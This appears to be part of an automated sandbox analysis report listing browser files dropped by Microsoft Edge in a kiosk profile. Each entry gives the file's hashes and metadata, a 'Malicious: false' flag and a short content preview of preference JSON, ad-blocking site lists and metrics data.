Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55jUJZGTtlg0NlA7S5AnvB8l7z3olnPV2vfCLsugvBUH7vTVIe9Y151SnmS2Auyvcr5UGYXBvzT2s0L3fKpCZl+2D91MLf04NPNNUni9BZmDP4Sfjk2Ig7ktgg8r8InfhHz//zSP7e8bquWlsDJ411jYlhlRsBQRm+LIWvOaiW4hdcyEra5fCtzINfylY7VRB4y

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\786d6fbe-9761-4938-82c5-19a412c489eb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	20786
Entropy (8bit):	6.0659076537736265
Encrypted:	false
SSDEEP:	384:RtMGQ7LBjuYXGIgtDAW5u0TDJ2q03X8NBSjYDniGC+Mh0lkdHd5q0:LMGQ7FCYXGIgtDAWtJ4nIDniGKh02td7
MD5:	321130877C554DE932B15362B64A251D
SHA1:	31BBA5AD4604E21392E31E6A562A99CAA9C8101C
SHA-256:	4514C29A72C705E316F58905B2EDCE78F1CA71DEFADBDAC325D18B94CD58CF57
SHA-512:	1D711BA02ABD4CBE9F4DA91DFA7B12F3A4A30E4EF815E775E1EEB2CAE26E0090F56A9DE6FF1C0A185D1F5EE9E935F1979E91D5C7D28D61509F3A5AD9B8ACE3DF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55jUJZGTtlg0NlA7S5AnvB8l7z3olnPV2vfCLsugvBUH7vTVIe9Y151SnmS2Auyvcr5UGYXBvzT2s0L3fKpCZl+2D91MLf04NPNNUni9BZmDP4Sfjk2Ig7ktgg8r8InfhHz//zSP7e8bquWlsDJ411jYlhlRsBQRm+LIWvOaiW4hdcyEra5fCtzINfylY7VRB4y

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\7a5c6d1b-2a06-45cf-9d90-fde82d78a082.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26447
Entropy (8bit):	6.053045423248555
Encrypted:	false
SSDEEP:	768:LMGQ7FCYXGIgtDAWtJ4nNHvT4cQRz69G9CAh02td7:LMGQ5XMBGxQRzN9C8j
MD5:	DF7F7B068CE2DF46ECEDC59FDCE9D716
SHA1:	5971061B2588622BD292E0842F7AFA244C203764
SHA-256:	D1D7E012306377E9B3CCEAC3E6834B91AE4F928255C300F7431E1F50EBF69463
SHA-512:	3B8677DA517E18015A086F9C52CA87B97C52A8E9EAE65F1D8D9CC6554DED744F9D9F08C94E5E9C2550A1D40EA88FF365D3EDE94579E7C8309FFC9B5EC61601EE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55jUJZGTtlg0NlA7S5AnvB8l7z3olnPV2vfCLsugvBUH7vTVIe9Y151SnmS2Auyvcr5UGYXBvzT2s0L3fKpCZl+2D91MLf04NPNNUni9BZmDP4Sfjk2Ig7ktgg8r8InfhHz//zSP7e8bquWlsDJ411jYlhlRsBQRm+LIWvOaiW4hdcyEra5fCtzINfylY7VRB4y

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\846de5d7-a771-4c50-b59c-3e50d33757e3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	22962
Entropy (8bit):	6.058181946900444
Encrypted:	false
SSDEEP:	384:RtMGQ7LBjuYXGIgtDAW5u0TDJ2q03X8NBSjYSVsvTbniGC+Mh0lkdHd5q0:LMGQ7FCYXGIgtDAWtJ4nIHvTbniGKh0c
MD5:	149168CFDD4472BA855EEAC3DC762E7E
SHA1:	C93CFB96FFE222D21BFAE82B8CA1F958520DBBEE
SHA-256:	6A4960B38A651E58967BE5020B0135026FE2D98FFA6BBD9F1F3B748B76CE4ABB
SHA-512:	3E3D7EB4808ACE4112A409AC0C6115F2576365E025A8D8E751BE0704E66B7182F5017DE940B72E46DCFCB35DF31E6067F117B63715F3ABEB4B876508AD1C70E5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55jUJZGTtlg0NlA7S5AnvB8l7z3olnPV2vfCLsugvBUH7vTVIe9Y151SnmS2Auyvcr5UGYXBvzT2s0L3fKpCZl+2D91MLf04NPNNUni9BZmDP4Sfjk2Ig7ktgg8r8InfhHz//zSP7e8bquWlsDJ411jYlhlRsBQRm+LIWvOaiW4hdcyEra5fCtzINfylY7VRB4y

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\85591e8d-e54d-4cbf-ab76-f48df88e85ed.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4235
Entropy (8bit):	5.501647803264855
Encrypted:	false
SSDEEP:	96:0q8NkGS1f/tFIQ58rh/cI9URoDotosJB2/v27pnsJkichsSDS4S4SDSRWI4a:/8NBSFYeoDU/fnskiYZT
MD5:	87945B080D8B3E3F41B7BE3E70898708
SHA1:	212B546169AC50526D05BF2E97E736C9D8306E66
SHA-256:	EF2CECDEAC326BCB1F799FFD6F169518E9A55BDD017FBB18EB9D725C4F9AE51D
SHA-512:	5548A62A0CF23D8DC715C9BA4788E869B420A7702E5C15F0A4D3A7659735F83D8E49FEA8CA46D072910C4D40D18D3416CC4A49BF5BE8795B03749CB61CF0D463
Malicious:	false
Preview:	{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nn

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\8cb370cb-3017-40df-ae81-13b16ad74c9e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	20786
Entropy (8bit):	6.065936025667821
Encrypted:	false
SSDEEP:	384:RtMGQ7LBjuYXGIgtDAW5u0TDJ2q03X8NBSlYDniGC+Mh0lkdHd5q0:LMGQ7FCYXGIgtDAWtJ4n+DniGKh02td7
MD5:	39B61633D930E4D599EC83FA4C300E0C
SHA1:	72E68A1977D0CBE9C7D3B22B2B1230FB41E8B946
SHA-256:	12D52C294A27E935375C5D77D3D0AEAD8985070F967667CFCA519BD95E3321AE
SHA-512:	C6459BF925711CC88D119A48B9E8CD67B66CD506589775616232D0C4C995E05C7B880F36634C6062857BD93B832E18381F3145C7B4B67B4CD291681DE6EA5B1E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55jUJZGTtlg0NlA7S5AnvB8l7z3olnPV2vfCLsugvBUH7vTVIe9Y151SnmS2Auyvcr5UGYXBvzT2s0L3fKpCZl+2D91MLf04NPNNUni9BZmDP4Sfjk2Ig7ktgg8r8InfhHz//zSP7e8bquWlsDJ411jYlhlRsBQRm+LIWvOaiW4hdcyEra5fCtzINfylY7VRB4y

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\97552c85-1b6f-41d7-bc9c-266983d790e9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2958
Entropy (8bit):	5.596337317712732
Encrypted:	false
SSDEEP:	48:YuBqDPEFMsFiHC0af/v1FIQUkHB+1drxJvB07+RpVDRG1PaJkXhocAwlRYz3nB0:Xq8NkC1f/tFIQ/B2/v27aGsJkicFYzXq
MD5:	E1B9950EC680C793CEE39C694C2EC0C8
SHA1:	CB4C731D6DC66C089373F79AA3ECDE25FCF4F3C1
SHA-256:	F801BC98AD0CACC16CE004ABC674EE7726A69977230FF1FC6A6A8419D3314C3B
SHA-512:	14F01C8AD0AEB05B7165A15842B1B7D8146B529330710D4EAF1331D98CD94B9CAA7A3F3557C1B8F72CDC68E3E05740F6724092B4B2E8ADA3E5B8B7169F087C5D
Malicious:	false
Preview:	{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAB0chaNMbocSpClzIjibPlBEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAB4yxMBh/ZmS1SrY0MwFG+syIS9OZK/HYD1T+zM3c4e7QAAAAAOgAAAAAIAACAAAACaA0R0KzOhB9+VgLqE3HMQWEjsbsol/2/BobElTeWV0jAAAAAoBUHh8AmAGRcF6vc5Oj54k79NqKVWlYcDNzR0E/QXpZHEl+46Zu+5CM7zz4QjBXpAAAAAL1z7YW3wPJLFUMk7UlKMwkoW0EO7IMIoKL01hPUibODAmYJgLfbAaI3lhBs2E8gbS39F6v9QKU006x9nnxajHA=="},"policy":{"last_statistics_update":"13369638492225873"},"profile":{"info_ca

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Ad Blocking\ade590cf-8759-45cb-8cb7-5f8ad5e9f8e6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640149995732079
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P75:fwUQC5VwBIiElEd2K57P75
MD5:	AD9FA3B6C5E14C97CFD9D9A6994CC84A
SHA1:	EF063B4A4988723E0794662EC9D9831DB6566E83
SHA-256:	DCC7F776DBDE2DB809D3402FC302DB414CF67FE5D57297DDDADCE1EE42CFCE8F
SHA-512:	81D9D59657CAF5805D2D190E8533AF48ACEBFFF63409F5A620C4E08F868710301A0C622D7292168048A9BC16C0250669FAAA2DCBF40419740A083C6ED5D79CFA
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640149995732079
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P75:fwUQC5VwBIiElEd2K57P75
MD5:	AD9FA3B6C5E14C97CFD9D9A6994CC84A
SHA1:	EF063B4A4988723E0794662EC9D9831DB6566E83
SHA-256:	DCC7F776DBDE2DB809D3402FC302DB414CF67FE5D57297DDDADCE1EE42CFCE8F
SHA-512:	81D9D59657CAF5805D2D190E8533AF48ACEBFFF63409F5A620C4E08F868710301A0C622D7292168048A9BC16C0250669FAAA2DCBF40419740A083C6ED5D79CFA
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\BrowserMetrics\BrowserMetrics-66D3ED5B-A7C.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.040186958802338
Encrypted:	false
SSDEEP:	192:yrUUjLYiVWK+ggCNlYJZzK1d9X0Y1Pg+znhHBNEchhcRQ8pgc+Dan8y08Tcm2RGY:GUUjjlsc68hh5Qec+Da08T2RGOD
MD5:	EE04F535CD168653774C6E07D6FD2F91
SHA1:	9DE9744870309BF979C4A84F40F17392085D2608
SHA-256:	8B6760F1ACF98DD95C552115A8ED8C557F47D34E3D774ACBBE3B1DC008BAE131
SHA-512:	457EAA10369D5B716A0E669DBD205216D4FB396DB23BDF9D3F4C3F34F23114B8933E7E45A8FB180671E8D8F91183AFFDDB814C35B0C97DCAAAC77673F8498055
Malicious:	false
Preview:	...@..@...@.....C.].....@................`..8P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".iwkovu20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@.............!.....................$}.CG....L.T.w..Ucw.}....u.$r....9...>.........."....."...2..."..:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...}?5^..P@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\BrowserMetrics\BrowserMetrics-66D3ED5C-1C40.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4560275807018238
Encrypted:	false
SSDEEP:	3072:XLBHWcbVl8D2c7uMmndapme+0YnfxD1Ycmi3xg1HFrjfBX+qnGUFBqQDZdfsgdyq:scj+Li3xaHd5dsNKaHtTXud
MD5:	755D83E71C4B854C4C5B9AF083D3B2C6
SHA1:	6CDBFE4E7903DC27F5FE79B78F88383FDF01B8B5
SHA-256:	1154F71E160B1CEAD0E4CA987E909B3F9F2AF23450B0ED149C908445489D6BC7
SHA-512:	31F42023D8231C6885BF1A502C9E984AB490AD4BC40FD856C5557D8C484F971F1FD29FAA12796218F50F568369D0771B14F790B1123CE3E7076AC42CB14C922F
Malicious:	false
Preview:	...@..@...@.....C.].....@................G.. G..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452....x86_64..?........".iwkovu20,1(.0..8..B....(.....10.0.19041.5462.Google Inc. (Google):bANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver-5.0.0)M..BU..Be...?j...GenuineIntel... .. ..............x86_64...J....s..^o..J...W..^o..J..,jp..^o..J.......^o..J../T...^o..J...X.p.^o..J.....p.^o..J...c...^o..J...Y...^o..J.......^o..J..w....^o..J...G.Y.^o..J..A....^o..J....c..^o..J...c=..^o..J....J..^o..J...h8..^o..J..3.(..^o..J.......^o..J..!n...^o..J...S@".^o..J.......^o..J.......^o..J...j.8.^o..J..@....^o..J.......^o..J...b.J.^o..J..G....^o..J..8...^o..J...#...^o..J....k..^o..J..S..O.^o.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.1174915006248
Encrypted:	false
SSDEEP:	3:FiWWltlojPHvAViHSRqOFhJXI2EyBl+BVP/Sh/JzvRWzVOcopxXA/latl:o1oj/vAViyRqsx+BVsJDR2VMpxXAaX
MD5:	D405DF7AB1C4C19E81BF56DC252F787F
SHA1:	D77806AE083D64B27C24325C8CDD0A57A8BDD72B
SHA-256:	435A534A3F26E2B94EDE978096D97C5802CDEB844FACF0A9755FB42F07C61A36
SHA-512:	B077240691338FB754DD26149B6667985F50B6D0057F6280F7676A13F305D11CB5E0F928D6E6866D41AF9EAA324A58585A5F56159F11AFB9D3BC6302AA6AFD61
Malicious:	false
Preview:	sdPC....................'.\|.s..K...h8`.M"1SCRpGKHAwpF5kOwXUUSc/ojBrTkNG2SgkvqW1WE7kI="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................273203e3-3d84-4f93-84e3-4d0f0277422e............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\throttle_store.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.6219280948873624
Encrypted:	false
SSDEEP:	3:8g6Vvn:8g6Vv
MD5:	9E4E94633B73F4A7680240A0FFD6CD2C
SHA1:	E68E02453CE22736169A56FDB59043D33668368F
SHA-256:	41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
SHA-512:	193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
Malicious:	false
Preview:	level=none expiry=0.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\00b78307-971e-4163-aee9-2f78a6dc235b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24800
Entropy (8bit):	5.565773545444131
Encrypted:	false
SSDEEP:	768:/2oys/WP7zfGc8F1+UoAYDCx9Tuqh0VfUC9xbog/OV2jzbprwZ1pGtuC:/2oys/WP7zfGcu1javnbawtZ
MD5:	97EEAEA4A9BAB13B52B45817598BEAD3
SHA1:	6842EEE43AFB3C72C3E05BC40C8E1E23549829EC
